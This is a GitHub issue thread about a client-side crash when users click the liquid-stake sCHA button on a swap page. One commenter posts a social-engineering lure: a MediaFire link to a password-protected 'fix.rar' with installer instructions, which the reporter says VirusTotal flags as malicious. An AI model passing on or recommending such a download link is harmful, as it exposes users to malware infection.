### ISSUE TITLE
Application Error: When User Clicks on Liquid Stake Charisma Button

### ISSUE THREAD

**Issue by firerum** [pointblankdev/charisma-web#44]
There is an Application error: a client-side exception has occurred (see the browser console for more information) whenever a user clicks on the sCHA button on the swap route.
<img width="1280" alt="Screenshot 2024-08-27 at 12 56 38 AM" src="https://github.com/user-attachments/assets/a97d1c95-9071-453e-84f2-7817a37d1afc">

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by firerum** [comment]
@r0zar I think there is a compromise here. Did you grant access to this dude above AMSNX. Running the download link on virustotal.com flagged the URL as malicious. Boot him out.

**Comment by firerum** [comment]
Fixed.
<img width="1280" alt="Screenshot 2024-08-27 at 1 40 45 PM" src="https://github.com/user-attachments/assets/1ae02e84-1cd9-4671-b504-f62692b5bc49">
